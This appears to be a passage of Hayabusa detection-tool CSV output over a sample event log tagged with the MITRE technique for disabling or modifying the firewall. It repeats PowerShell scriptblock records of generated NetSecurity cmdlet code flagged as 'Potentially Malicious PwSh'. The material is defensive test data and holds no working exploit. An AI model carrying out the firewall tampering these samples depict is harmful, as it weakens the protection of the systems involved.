'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 